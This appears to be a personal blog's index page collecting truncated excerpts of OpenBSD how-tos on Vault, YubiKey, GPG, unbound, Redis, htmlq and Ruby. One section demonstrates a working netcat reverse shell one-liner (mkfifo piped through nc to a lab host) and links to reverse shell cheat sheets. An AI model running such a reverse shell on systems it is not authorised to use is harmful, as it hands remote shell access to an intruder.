OpenBSD

Vault on OpenBSD

How to install and run HashiCorp Vault on OpenBSD. In addition to [this Blog Entry](https://blog.stoege.net/categories/vault/), here are some instructions for OpenBSD.

Requirements

- VM with OpenBSD 7.2 (or older …) and root/doas permission
- Domain, or at least a FQDN name pointing to your VM
- HTTP/HTTPS allowed from the Internet (for certificate generation)
- Nginx installed (pkg_add nginx)

Source: https://developer.hashicorp.com/vault/docs/get-started/developer-qs

Install Vault

All the steps must be run as root (or with doas).

```
pkg_add vault
```

Vault Config

Backup the prev.

Yubikey - on OpenBSD

Running YubiKey on OpenBSD. Buy a key and give it a try …

Source: https://www.yubico.com/

Install Software

```
pkg_add yubikey-manager-3.1.2p4
quirks-6.42 signed on 2023-01-08T01:39:04Z
yubikey-manager-3.1.2p4:py3-click-7.1.2: ok
yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok
yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok
yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok
yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok
yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok
yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok
yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok
yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok
yubikey-manager-3.1.2p4:json-c-0.16: ok
yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok
yubikey-manager-3.1.2p4: ok
The following new rcscripts were installed: /etc/rc.d/pcscd
See rcctl(8) for details.
--- +yubikey-manager-3.1.2p4 -------------------
NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD.
Most of the "ykman fido xxx" commands (pin-setting and others) stall.
```

OpenBSD 7.2

OpenBSD 7.2 finally released. Yesterday, the 53rd release of OpenBSD got published, [Version 7.2](https://www.openbsd.org/72.html). I'll upgrade my boxes as usual with the following script. The most obvious change is the performance improvement for the package manager, but there is always more; see undeadly.

Upgrade Guide

As usual, follow the official Upgrade Guide. You can upgrade with a USB stick, ISO image, PXE boot or inline (from a running system).

GPG & Gopass & Gitlab

GPG and how to use it

Create a key with ECC

```
gpg --expert --full-generate-key
```

- (9) ECC and ECC
- (1) Curve 25519
- 0 = key does not expire (or whatever you prefer!)
- Real name: Max Muster
- Email address: max@muster.net
- Comment: -

```
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid                      Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]
```

Public Key

```
max@host $ gpg
/home/max/.gnupg/pubring.kbx
----------------------------
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.
```

OpenBSD - ReverseShell

Reverse Shells

- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
- https://kb.systemoverlord.com/security/postex/reverse/

Test it

Listen on Host A

Set the listener on Host A (192.168.1.100):

```
hostA # nc -l 4242
```

Start Reverse Shell on Host B

```
hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f
```

Here we are:

```
hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere
```

nice ;)

PuffyPages

Some cool pages about OpenBSD

- https://www.openbsd.org
- https://man.openbsd.org
- https://www.openbsdfoundation.org
- https://marc.info
- https://undeadly.org/cgi?action=front
- https://bsdly.blogspot.com/
- https://obsd.solutions/en/blog/
- https://dataswamp.org/~solene/
- https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/
- https://vincentdelft.be/category/openbsd
- http://ratfactor.com/openbsd/2022-08-02-install
- https://blog.lambda.cx/tags/openbsd/
- https://www.openbsdjumpstart.org/#/
- https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf
- https://why-openbsd.rocks/fact/
- https://openbsdrouterguide.net/
- https://blog.obtusenet.com/
- http://kestrel.nmt.edu/~raymond/software/howtos/openbsd.html

Sensorsd - UPS Shutdown

Shutdown Hosts on Power Outages

Everybody is talking about power outages. Let's assume you have a Smart-UPS for your playground and you'd like to shut down some infrastructure to avoid trouble with corrupt filesystems, broken VMs and things like that.

Connect the UPS to the APU via USB cable. dmesg shows the UPS connected:

```
APU# dmesg
uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ...
uhidev0: iclass 3/0, 142 report ids
upd0 at uhidev0
uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1
uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1
```

OpenBSD - Full Disk Encryption

Intro

I never used the full disk encryption feature as there was no need for it. It doesn't make sense for hosted VMs, as you have to enter the passphrase at the console at every boot. So it's a pain, and the passphrase can still be intercepted on the hoster's infrastructure. Disk encryption does not make sense at home either, as all my devices remain at home (and hopefully never get stolen). It would make sense on a notebook, but I'm more the Apple fanboy when it comes to portable machines.

JC - JSON from CLI

How to build JSON from the CLI. We all like JSON, don't we?

https://kellyjonbrazil.github.io/jc/docs/parsers/ping

Add package

```
doas pkg_add jc
```

Try ping

```
openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null
{
  "destination_ip": "1.1.1.1",
  "data_bytes": 56,
  "pattern": null,
  "destination": "1.1.1.1",
  "packets_transmitted": 3,
  "packets_received": 3,
  "packet_loss_percent": 0.0,
  "duplicates": 0,
  "round_trip_ms_min": 9.219,
  "round_trip_ms_avg": 9.826,
  "round_trip_ms_max": 10.158,
  "round_trip_ms_stddev": 0.43,
  "responses": [
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 0,
      "ttl": 59,
      "time_ms": 10.
```

Unbound - Logging

Enable Logging for Unbound

Update unbound.conf (/var/unbound/etc/unbound.conf). On OpenBSD unbound runs chrooted in /var/unbound, so the logfile path in the config is relative to that chroot:

```
server:
  logfile: /log/unbound.log
  verbosity: 1
  log-queries: yes
  ...
```

Create folder/logfile (the directory is created by root, so the file operations need doas as well):

```
log=/var/unbound/log/unbound.log
doas mkdir /var/unbound/log/
doas touch $log
doas chmod 660 $log
doas chown _unbound:_unbound $log
```

Restart service

```
doas rcctl restart unbound
```

Tail logfile

```
# tail -f /var/unbound/log/unbound.log
[1660208341] unbound[3279:0] notice: init module 0: validator
[1660208341] unbound[3279:0] notice: init module 1: iterator
[1660208341] unbound[3279:0] info: start of service (unbound 1.15.0).
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.
```

Unbound - RemoteControl

How to Enable Remote Control for Unbound

Setup Remote Control

```
$ doas unbound-control-setup
setup in directory /var/unbound/etc
Generating RSA private key, 3072 bit long modulus
..................................++++
..................................++++
e is 010001 (0x65537)
Generating RSA private key, 3072 bit long modulus
........................................++++
........................................++++
e is 010001 (0x65537)
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
removing artifacts
Setup success. Certificates created. Enable in unbound.conf file to use
```

Enable in unbound.conf

/var/unbound/etc/unbound.conf

HTMLQ

Stumbled upon something cool: htmlq! It's like jq, but for HTML.

Installation

Rust

htmlq needs Rust, so let's install Rust first.

```
doas pkg_add rust
```

Add Cargo to PATH

```
cat << 'EOF' |doas tee -a /etc/profile
# Rust/Cargo
export PATH=$PATH:/root/.cargo/bin
EOF
. /etc/profile
```

Install HTMLQ

```
doas cargo install htmlq
```

Some Examples

Extract links

```
curl -s https://www.openbsd.org | htmlq --attribute href a |head
```

Example

```
user@nixbox$ curl -s https://www.openbsd.org | htmlq --attribute href a |head
goals.
```

OpenBSD 7.2 - Compare

There are a few weeks left until OpenBSD 7.2 gets released. Anyhow, running -current is a good way to get a "preview" of what's in the pipeline and will come soon. One of the pain points was updating packages on OpenBSD. Not because it was difficult, but because it took quite a lot of time, especially when you run a bunch of machines in different networks.

Version and Time consumption

```
sysctl kern.version
pkg_info |wc -l
time pkg_add -Vu
```

OpenBSD 7.

Redis on OpenBSD

Let's play a bit with Redis, an in-memory data store for caching, streaming and message brokering. https://redis.io/

Install

```
doas pkg_add redis
doas rcctl enable redis
doas rcctl restart redis
```

Package Summary

What did we get installed?

```
$ doas pkg_info -L redis
Information for inst:redis-6.2.7

Files:
/etc/rc.d/redis
/usr/local/bin/redis-benchmark
/usr/local/bin/redis-check-aof
/usr/local/bin/redis-check-rdb
/usr/local/bin/redis-cli
/usr/local/bin/redis-sentinel
/usr/local/bin/redis-server
/usr/local/share/examples/redis/redis.conf
/usr/local/share/examples/redis/sentinel.conf
```

A server, a client, a configuration file, …

Keep Alive

Send a ping …

Ruby on Rails

https://github.com/Bratela/openbsd

Install Ruby

Install Ruby and set symlinks (each unversioned name points at its own versioned binary):

```
doas su -
pkg_add ruby-3.1.2
ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby
ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle
ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler
ln -sf /usr/local/bin/erb31 /usr/local/bin/erb
ln -sf /usr/local/bin/gem31 /usr/local/bin/gem
ln -sf /usr/local/bin/irb31 /usr/local/bin/irb
ln -sf /usr/local/bin/racc31 /usr/local/bin/racc
ln -sf /usr/local/bin/rake31 /usr/local/bin/rake
ln -sf /usr/local/bin/rbs31 /usr/local/bin/rbs
ln -sf /usr/local/bin/rdbg31 /usr/local/bin/rdbg
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc
ln -sf /usr/local/bin/ri31 /usr/local/bin/ri
ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof
```

Install Nokogiri

```
pkg_add ruby31-nokogiri-1.13.1p0
```

Install Rails

pkg_add ruby-3.